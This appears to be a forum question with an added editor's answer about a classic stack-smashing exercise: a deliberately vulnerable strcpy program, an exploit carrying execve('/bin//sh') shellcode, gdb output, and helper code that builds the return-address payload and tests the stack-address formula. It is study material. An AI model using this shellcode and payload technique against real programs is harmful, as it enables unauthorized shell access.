problem with buffer overflow
However, I can't reproduce an easy example (using the environment) of a buffer overflow on my system. I tried other basic code found on the internet and still nothing. Here is my code:
// ---- vuln2.c
#include <stdio.h>
#include <string.h>   /* strcpy */

/* Deliberately vulnerable: argv[1] is copied into a 16-byte stack buffer
   with no length check, so a longer argument overwrites what lies above
   the buffer, including the saved return address. */
int main(int argc, char *argv[])
{
    char buffer[16];
    if (argc > 1)
        strcpy(buffer, argv[1]);
    return 0;
}
// ---- ex2.c
#include <stdio.h>
#include <string.h>   /* strlen */
#include <unistd.h>   /* execle */

#define BUFSIZE 40
#define ALIGNMENT 0

/* execve("/bin//sh") shellcode, handed to vuln2 as its only environment string */
char sc[] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void)
{
    char *env[2] = {sc, NULL};
    char buf[BUFSIZE];
    int i;
    int *ap = (int *)(buf + ALIGNMENT);
    /* expected address of sc inside vuln2: just below the program path,
       which the kernel places just below the top of the stack */
    int ret = 0xbffffffa - strlen(sc) - strlen("/home/programming/vuln2");

    /* fill the argument with copies of the return address */
    for (i = 0; i < BUFSIZE - 4; i += 4)
    {
        *ap++ = ret;
    }
    buf[BUFSIZE - 4] = '\0';   /* terminate the string so execle and strcpy see a proper C string */
    execle("/home/programming/vuln2", "vuln2", buf, (char *)NULL, env);
    return 0;
}
If I believe what I learned, ex2 should provide a new shell:
[user@host]$ ./ex2
Segmentation fault (core dumped)
[user@host]$
This is not really the case... Trying to see what happens with gdb:
[user@host]$ gdb -c core.10045
GNU gdb 6.3-5mdk (Mandriva Linux release 2006.0)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandriva-linux-gnu".
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/libthread_db.so.1".
Loaded system supplied DSO at 0xffffe000
Core was generated by `foo2 '.
Program terminated with signal 11, Segmentation fault.
#0 0xbfffffc8 in ?? ()
(gdb) x/12 0xbfffffc8
0xbfffffc8: Error accessing memory address 0xbfffffc8: No such file or directory.
(gdb) p $eip
$1 = (void *) 0xbfffffc8
(gdb) p $esp
$2 = (void *) 0xbfe8fec0
(gdb) x/12 0xbfe8fec0
0xbfe8fec0: 0xbfffffc8 0xbfffffc8 0xbfffffc8 0x0804844a
0xbfe8fed0: 0x08049654 0x00000000 0xb7f93cc0 0xbfe8ff08
0xbfe8fee0: 0xbfe8fec0 0xb7e4be05 0x00000000 0x00000000
(gdb)
It's as if 0xbffffffa is not the limit address as described. Does somebody understand what is wrong here? For information, my system is Mandriva 2006 with kernel 2.6.12-12mdk-i686-up-4GB.
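The constant 0xbffffffa in ex2.c is not magic: it is derived from the classic 32-bit Linux stack layout in which the stack ends at 0xc0000000, the last four bytes are zero, the exec path sits right below them and the first environment string right below the path. The added example below (editor's code, not the original poster's) does two things: it builds the argv[1] payload properly (NUL-terminated, with a check that the return address contains no 0x00 byte, since strcpy in vuln2 would stop there), and it re-execs itself the way ex2.c execs vuln2, with a single environment string and argv[0] set to the exec path, so the child can compare the formula's prediction with where the environment string really landed. It assumes a Linux host (it reads /proc/self/exe) and a vuln2 path of "/home/programming/vuln2" for the worked calculation; the prediction function is only meaningful for a 32-bit process. When the child prints a mismatch, the fixed constant is wrong on that machine, which is what a stack pointer far below 0xbffff000 (as in the core dump above, where esp is 0xbfe8fec0) suggests: a kernel that randomizes the stack top.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

#define PAYLOAD_LEN 36   /* what ex2.c's loop writes: BUFSIZE - 4 bytes */

/* Same execve("/bin//sh") shellcode as in ex2.c. */
static const char shellcode[] =
    "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* Classic unrandomized 32-bit Linux layout: stack top 0xc0000000, four zero
 * bytes, then the exec path with its NUL, then the first environment string
 * with its NUL. The first environment string therefore starts at
 *   0xc0000000 - 4 - (strlen(path) + 1) - (strlen(env0) + 1)
 * = 0xbffffffa - strlen(path) - strlen(env0), the formula used by ex2.c. */
uint32_t predict_env_addr(const char *path, const char *env0)
{
    return 0xbffffffaU - (uint32_t)strlen(path) - (uint32_t)strlen(env0);
}

/* Build the argv[1] string for vuln2: `len` bytes, filled from offset `align`
 * with 4-byte little-endian copies of `ret`, then a terminating NUL. Returns
 * the payload length, or -1 when it does not fit in `out` or when `ret`
 * contains a 0x00 byte (strcpy in vuln2 would truncate the copy there). */
int build_payload(char *out, size_t outsize, uint32_t ret, size_t len, size_t align)
{
    size_t i;
    if (len + 1 > outsize || align >= 4 || len < align + 4)
        return -1;
    for (i = 0; i < 4; i++)
        if (((ret >> (8 * i)) & 0xff) == 0)
            return -1;
    memset(out, 'A', len);                 /* filler for bytes the addresses do not cover */
    for (i = align; i + 4 <= len; i += 4) {
        out[i]     = (char)(ret & 0xff);
        out[i + 1] = (char)((ret >> 8) & 0xff);
        out[i + 2] = (char)((ret >> 16) & 0xff);
        out[i + 3] = (char)((ret >> 24) & 0xff);
    }
    out[len] = '\0';
    return (int)len;
}

int main(int argc, char **argv)
{
    if (argc > 1 && strcmp(argv[1], "--probe") == 0) {
        /* Child: exec'd with one environment string and argv[0] == exec path,
         * exactly the shape ex2.c gives vuln2. Compare formula with reality. */
        uintptr_t actual;
        uint32_t predicted;
        if (environ[0] == NULL) {
            fprintf(stderr, "probe needs exactly one environment string\n");
            return 1;
        }
        actual    = (uintptr_t)environ[0];
        predicted = predict_env_addr(argv[0], environ[0]);
        printf("exec path : %s\n", argv[0]);
        printf("predicted : 0x%08" PRIx32 "\n", predicted);
        printf("actual    : 0x%" PRIxPTR "\n", actual);
        printf("%s\n", actual == predicted ? "formula holds on this machine"
                                           : "formula does NOT hold on this machine");
        return 0;
    }

    /* Parent: show the payload ex2.c meant to send for the assumed vuln2 path. */
    char payload[PAYLOAD_LEN + 4];
    uint32_t ret = predict_env_addr("/home/programming/vuln2", shellcode);
    int n = build_payload(payload, sizeof payload, ret, PAYLOAD_LEN, 0);
    if (n < 0) {
        fprintf(stderr, "payload rejected (NUL byte in address or no room)\n");
        return 1;
    }
    printf("ret = 0x%08" PRIx32 ", payload (%d bytes):", ret, n);
    for (int i = 0; i < n; i++)
        printf(" %02x", (unsigned char)payload[i]);
    printf("\n");

    /* Then re-exec ourselves with the same environment shape as ex2.c uses. */
    char path[4096];
    ssize_t plen = readlink("/proc/self/exe", path, sizeof path - 1);
    if (plen < 0) {
        perror("readlink");
        return 1;
    }
    path[plen] = '\0';
    char *env[] = { (char *)shellcode, NULL };
    execle(path, path, "--probe", (char *)NULL, env);
    perror("execle");
    return 1;
}
```

With the 24-byte shellcode and the 23-character path "/home/programming/vuln2", the predicted address is 0xbfffffcb; the probe is the quick way to learn whether that constant means anything on the machine you are testing before spending time on alignment.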

